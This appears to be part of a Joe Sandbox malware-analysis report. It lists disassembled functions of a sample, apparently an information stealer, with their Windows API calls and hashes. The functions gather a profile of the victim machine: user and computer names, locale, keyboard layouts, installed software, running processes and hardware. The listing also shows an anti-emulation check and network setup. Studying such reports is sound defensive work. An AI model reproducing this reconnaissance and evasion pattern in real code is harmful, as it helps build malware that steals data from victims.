Part of subcall function 6C4330F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C433127
Part of subcall function 6C4330F0: __aulldiv.LIBCMT ref: 6C433140

Part of subcall function 6C46AB2A: __onexit.LIBCMT ref: 6C46AB30

Memory Dump Source

Source File: 00000000.00000002.2271842523.000000006C431000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C430000, based on PE: true

Associated: 00000000.00000002.2271798919.000000006C430000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2272007569.000000006C4AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2272093046.000000006C4BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2272122694.000000006C4C2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c430000_jlO7971vUz.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: dc3515fcf52dfae5d677b4df3217db757dd83d367654db87d5ae357ef5e2aef5
Instruction ID: 4faeb315304aeb0c5625095a227661803b567413297989d8bd1d8ab5a73ef840
Opcode Fuzzy Hash: dc3515fcf52dfae5d677b4df3217db757dd83d367654db87d5ae357ef5e2aef5
Instruction Fuzzy Hash: 32F0F91AE2174997DA10FF398841EE67770AFAB118F50531DEC4C53511FB2061DAC3C9

Function 017F7380 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 017F7394
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 017F73B5
CloseHandle.KERNEL32(00000000), ref: 017F73BF

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 119d90b6dde376d6d885e005b04a71bbc0490d6133f8e34cb39a782e45b29d7a
Instruction ID: 5a384d3699bd857caf5245e9dbe53c5be67d36d5db4d8530b648dc33a44ca897
Opcode Fuzzy Hash: 119d90b6dde376d6d885e005b04a71bbc0490d6133f8e34cb39a782e45b29d7a
Instruction Fuzzy Hash: 6DF0F47594020CFBDB15DFA4D84AFEEB778EB08704F108558BB1957284D6B06E85CB90

Function 017E10D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,017F494C), ref: 017E10EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,017F494C), ref: 017E10F2
ExitProcess.KERNEL32 ref: 017E1103

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: ea87f46ca5650612dcfa073f09f3c9ed8f904e099caa31368a8abab533a78ac3
Instruction ID: a55b88052bd9b3143cfbabc6720d75e1783f122cc6200aa7a7b7853d57320de3
Opcode Fuzzy Hash: ea87f46ca5650612dcfa073f09f3c9ed8f904e099caa31368a8abab533a78ac3
Instruction Fuzzy Hash: 0BE08674A8530CFBEB219F90DD0FB0CBAF89B04B16F104054F70D7A1C4C6B426018B58

Function 017F0CF0 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F5430: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 017F5472
Part of subcall function 017F5430: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 017F54AF
Part of subcall function 017F5430: GetProcessHeap.KERNEL32(00000000,00000104), ref: 017F5533
Part of subcall function 017F5430: HeapAlloc.KERNEL32(00000000), ref: 017F553A

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F55C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 017F55F7
Part of subcall function 017F55C0: HeapAlloc.KERNEL32(00000000), ref: 017F55FE
Part of subcall function 017F55C0: RegOpenKeyExA.KERNEL32(80000002,013B7E98,00000000,00020119,?), ref: 017F561E
Part of subcall function 017F55C0: RegQueryValueExA.KERNEL32(?,013C08F0,00000000,00000000,000000FF,000000FF), ref: 017F563F
Part of subcall function 017F55C0: RegCloseKey.ADVAPI32(?), ref: 017F5652

Part of subcall function 017F5690: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,017FBA90,000000FF,?,017F0F79,00000000,?,013C0BE8,00000000,?), ref: 017F56C2
Part of subcall function 017F5690: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,017FBA90,000000FF,?,017F0F79,00000000,?,013C0BE8,00000000,?), ref: 017F56C9

Part of subcall function 017F5720: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,017E1177), ref: 017F5750
Part of subcall function 017F5720: HeapAlloc.KERNEL32(00000000,?,?,?,017E1177), ref: 017F5757
Part of subcall function 017F5720: GetUserNameA.ADVAPI32(00000104,00000104), ref: 017F576F

Part of subcall function 017F57B0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,017F495B), ref: 017F57E0
Part of subcall function 017F57B0: HeapAlloc.KERNEL32(00000000,?,?,?,017F495B), ref: 017F57E7
Part of subcall function 017F57B0: GetComputerNameA.KERNEL32(?,00000104), ref: 017F57FF

Part of subcall function 017F5850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,017FE7A8,00000000,?), ref: 017F5880
Part of subcall function 017F5850: HeapAlloc.KERNEL32(00000000,?,?,?,?,017FE7A8,00000000,?), ref: 017F5887
Part of subcall function 017F5850: GetLocalTime.KERNEL32(?,?,?,?,?,017FE7A8,00000000,?), ref: 017F5894
Part of subcall function 017F5850: wsprintfA.USER32 ref: 017F58C3

Part of subcall function 017F5900: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013C0A28,00000000,?,017FE7B8,00000000,?,00000000,00000000), ref: 017F5933
Part of subcall function 017F5900: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,013C0A28,00000000,?,017FE7B8,00000000,?,00000000,00000000,?), ref: 017F593A
Part of subcall function 017F5900: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013C0A28,00000000,?,017FE7B8,00000000,?,00000000,00000000,?), ref: 017F594D

Part of subcall function 017F59D0: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,013C0A28,00000000,?,017FE7B8,00000000,?,00000000,00000000), ref: 017F5A05

Part of subcall function 017F5A60: GetKeyboardLayoutList.USER32(00000000,00000000,017FE12A), ref: 017F5AB1
Part of subcall function 017F5A60: LocalAlloc.KERNEL32(00000040,?), ref: 017F5AC9
Part of subcall function 017F5A60: GetKeyboardLayoutList.USER32(?,00000000), ref: 017F5ADD
Part of subcall function 017F5A60: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 017F5B32
Part of subcall function 017F5A60: LocalFree.KERNEL32(00000000), ref: 017F5BF2

Part of subcall function 017F5C50: GetSystemPowerStatus.KERNEL32(?), ref: 017F5C7D

GetCurrentProcessId.KERNEL32(00000000,?,013C0B48,00000000,?,017FE7CC,00000000,?,00000000,00000000,?,013C0A58,00000000,?,017FE7C8,00000000), ref: 017F135E

Part of subcall function 017F7380: OpenProcess.KERNEL32(00000410,00000000,?), ref: 017F7394
Part of subcall function 017F7380: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 017F73B5
Part of subcall function 017F7380: CloseHandle.KERNEL32(00000000), ref: 017F73BF

Part of subcall function 017F5CD0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 017F5D07
Part of subcall function 017F5CD0: HeapAlloc.KERNEL32(00000000), ref: 017F5D0E
Part of subcall function 017F5CD0: RegOpenKeyExA.KERNEL32(80000002,013B8330,00000000,00020119,?), ref: 017F5D2E
Part of subcall function 017F5CD0: RegQueryValueExA.KERNEL32(?,013C0BA8,00000000,00000000,000000FF,000000FF), ref: 017F5D4F
Part of subcall function 017F5CD0: RegCloseKey.ADVAPI32(?), ref: 017F5D62

Part of subcall function 017F5E30: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 017F5E99
Part of subcall function 017F5E30: GetLastError.KERNEL32 ref: 017F5EA8

Part of subcall function 017F5DA0: GetSystemInfo.KERNEL32(017FE7D4), ref: 017F5DD0
Part of subcall function 017F5DA0: wsprintfA.USER32 ref: 017F5DE6

Part of subcall function 017F5FD0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013C0938,00000000,?,017FE7D4,00000000,?,00000000), ref: 017F6000
Part of subcall function 017F5FD0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,013C0938,00000000,?,017FE7D4,00000000,?,00000000,00000000), ref: 017F6007
Part of subcall function 017F5FD0: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 017F6028
Part of subcall function 017F5FD0: __aulldiv.LIBCMT ref: 017F6042
Part of subcall function 017F5FD0: __aulldiv.LIBCMT ref: 017F6050
Part of subcall function 017F5FD0: wsprintfA.USER32 ref: 017F607C

Part of subcall function 017F6690: CreateDCA.GDI32(013B09D8,00000000,00000000,00000000), ref: 017F66C5
Part of subcall function 017F6690: GetDeviceCaps.GDI32(?,00000008), ref: 017F66D4
Part of subcall function 017F6690: GetDeviceCaps.GDI32(?,0000000A), ref: 017F66E3
Part of subcall function 017F6690: ReleaseDC.USER32(00000000,?), ref: 017F66F2
Part of subcall function 017F6690: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,017FE7D0,00000000,?), ref: 017F66FF
Part of subcall function 017F6690: HeapAlloc.KERNEL32(00000000,?,?,?,?,017FE7D0,00000000,?), ref: 017F6706
Part of subcall function 017F6690: wsprintfA.USER32 ref: 017F6720

Part of subcall function 017F60C0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 017F6124

Part of subcall function 017F61F0: RegOpenKeyExA.KERNEL32(00000000,013BE438,00000000,00020019,00000000,017FE146), ref: 017F6274

Part of subcall function 017F61F0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 017F62F6
Part of subcall function 017F61F0: wsprintfA.USER32 ref: 017F6329
Part of subcall function 017F61F0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 017F634B
Part of subcall function 017F61F0: RegCloseKey.ADVAPI32(00000000), ref: 017F635C
Part of subcall function 017F61F0: RegCloseKey.ADVAPI32(00000000), ref: 017F6369

Part of subcall function 017F6550: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 017F659A
Part of subcall function 017F6550: Process32First.KERNEL32(?,00000128), ref: 017F65AE
Part of subcall function 017F6550: Process32Next.KERNEL32(?,00000128), ref: 017F65C3
Part of subcall function 017F6550: FindCloseChangeNotification.KERNEL32(?), ref: 017F6631

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 017F193B

Part of subcall function 017E4DE0: lstrlen.KERNEL32(00000000), ref: 017E4E6A
Part of subcall function 017E4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 017E4EDB
Part of subcall function 017E4DE0: StrCmpCA.SHLWAPI(?,013BE608), ref: 017E4EF9

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CapsCreateCurrentDeviceEnumInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerDefaultDevicesDirectoryDisplayErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorReleaseSnapshotToolhelp32VolumeWindowsWow64Zone
String ID:
API String ID: 2088259770-0
Opcode ID: 7580207afce5747d790b465306946bfac597ddf71f675bb8a5e41fa1c86dae8f
Instruction ID: cecb324fa709b9a8265b158479a5c0a65fc9fe845943d8193e7b0450f0ca9190
Opcode Fuzzy Hash: 7580207afce5747d790b465306946bfac597ddf71f675bb8a5e41fa1c86dae8f
Instruction Fuzzy Hash: 74723C72C11119AACF19EB90DC98EDFF378AF25300F50529D921662669EF303B49CF66

Function 017E65F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 017E66AF

Strings

@, xrefs: 017E6689

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 1dc1676e864e5ae1f6eaf1c42e608a6075f681ef6894a6a8eefaf0f85e5b2e27
Instruction ID: 376ad6f10329bfc2a652febe292b1f54bed9acbdd398249230a2062ed8e4165f
Opcode Fuzzy Hash: 1dc1676e864e5ae1f6eaf1c42e608a6075f681ef6894a6a8eefaf0f85e5b2e27
Instruction Fuzzy Hash: 2C21C574A10208EFDB04CF89C598BADFBF1BB58304F1485D9E959AB341D335AA81CF80

Function 00B37E6E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

rand_s.MSVCRT ref: 00B37E76

Strings

invalid random_device value, xrefs: 00B37E85

Memory Dump Source

Source File: 00000000.00000002.2242638566.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2242043905.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242900451.0000000000B42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242930147.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000B4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_jlO7971vUz.jbxd

Similarity

API ID: rand_s
String ID: invalid random_device value
API String ID: 863162693-3926945683
Opcode ID: 9c0e71f93ea81c2b9a1e6a948c9c91eb6f407c8ced3b15a1f9b82b20666f9748
Instruction ID: 025011ead9d9bec11ba438ca041b703cea1c827cc505d869e19a56e2f3e197ba
Opcode Fuzzy Hash: 9c0e71f93ea81c2b9a1e6a948c9c91eb6f407c8ced3b15a1f9b82b20666f9748
Instruction Fuzzy Hash: 6CC0125560420EBA8B18EBE5990288973EC8A01658F3044D5B21096541DE60EE042260

Function 017E6750 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1b34a9553783918dab9f95d3f81a838e62a9348c6d48d62d37f2976bedee07
Instruction ID: 59af24d17f45844ecf06c0df2209ca988722bb691e8535f10a3c8770c6234848
Opcode Fuzzy Hash: bc1b34a9553783918dab9f95d3f81a838e62a9348c6d48d62d37f2976bedee07
Instruction Fuzzy Hash: E361E6B5D00209EFDB14DF98D988BEEBBF0BB58304F108598F50567244D775AA94CFA1

Function 017F5DA0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(017FE7D4), ref: 017F5DD0
wsprintfA.USER32 ref: 017F5DE6

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: d3ea2439f558a28cfe820067456029e7eab1c1ca7846505be211506d9bb457b0
Instruction ID: 4626fd7a2b8e8d30ed41906f420a1f5a123f252f2a8166823c847ec66599da0f
Opcode Fuzzy Hash: d3ea2439f558a28cfe820067456029e7eab1c1ca7846505be211506d9bb457b0
Instruction Fuzzy Hash: CFF096F1D00208EBCB14CF85DD45FAAF77CFB48624F40466DF615A3280D77959148BA1

Function 00B3860D Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(?,00B47E5C), ref: 00B31507
_callnewh.MSVCRT ref: 00B38615
malloc.MSVCRT ref: 00B38622

Memory Dump Source

Source File: 00000000.00000002.2242638566.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2242043905.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242900451.0000000000B42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242930147.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000B4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_jlO7971vUz.jbxd

Similarity

API ID: ExceptionThrow_callnewhmalloc
String ID:
API String ID: 4260808042-0
Opcode ID: 7437727aee4f0c18f3fa8182ba33c59c03e8df612a71839062716b2314eda6af
Instruction ID: 4dcbbda0ba0174ff184adbb0bae8e3f5aba997076fc50170b11ba7181c38924e
Opcode Fuzzy Hash: 7437727aee4f0c18f3fa8182ba33c59c03e8df612a71839062716b2314eda6af
Instruction Fuzzy Hash: AAD05E2500070AA58E111968DC170693ACDAA443B0F3481E1F81D581E2EF30C9A19685

Function 017EAD00 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017E9800: memcmp.MSVCRT ref: 017E981B
Part of subcall function 017E9800: memset.MSVCRT ref: 017E984E
Part of subcall function 017E9800: LocalAlloc.KERNEL32(00000040,?), ref: 017E989E

lstrlen.KERNEL32(00000000), ref: 017EB1B0
lstrlen.KERNEL32(00000000), ref: 017EB1C4

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E4DE0: lstrlen.KERNEL32(00000000), ref: 017E4E6A
Part of subcall function 017E4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 017E4EDB
Part of subcall function 017E4DE0: StrCmpCA.SHLWAPI(?,013BE608), ref: 017E4EF9

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 26db4d6f1233a3dbd1b5d7bc57e513b1e952456c52fd797951036bf23fe795cc
Instruction ID: 63dd3d0548a437c7da55d2b384fd30be0ea9ca086b333c443657ac22b11ae541
Opcode Fuzzy Hash: 26db4d6f1233a3dbd1b5d7bc57e513b1e952456c52fd797951036bf23fe795cc
Instruction Fuzzy Hash: 46E1C1728101199BCF15EBA4DC98EEFF378BF24300F40419DE206625A5EF746A49CF66

Function 017EA700 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

lstrlen.KERNEL32(00000000), ref: 017EA97A
lstrlen.KERNEL32(00000000), ref: 017EA98E

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E4DE0: lstrlen.KERNEL32(00000000), ref: 017E4E6A
Part of subcall function 017E4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 017E4EDB
Part of subcall function 017E4DE0: StrCmpCA.SHLWAPI(?,013BE608), ref: 017E4EF9

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: d60067b73f762a57496dbf659d1ff4733f163ee24147a4f68fcbe80e0cad4f1a
Instruction ID: 024fffe4d31d6b04c970931d7b83d8dececf9c66062f0346163d1a05a35a9512
Opcode Fuzzy Hash: d60067b73f762a57496dbf659d1ff4733f163ee24147a4f68fcbe80e0cad4f1a
Instruction Fuzzy Hash: 92910F769101099BCF15EBA0DC98EEFF379AF24300F40416DE20663659EF746A49CB63

Function 017EAA40 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

lstrlen.KERNEL32(00000000), ref: 017EAC3E
lstrlen.KERNEL32(00000000), ref: 017EAC52

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Part of subcall function 017E4DE0: lstrlen.KERNEL32(00000000), ref: 017E4E6A
Part of subcall function 017E4DE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 017E4EDB
Part of subcall function 017E4DE0: StrCmpCA.SHLWAPI(?,013BE608), ref: 017E4EF9

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
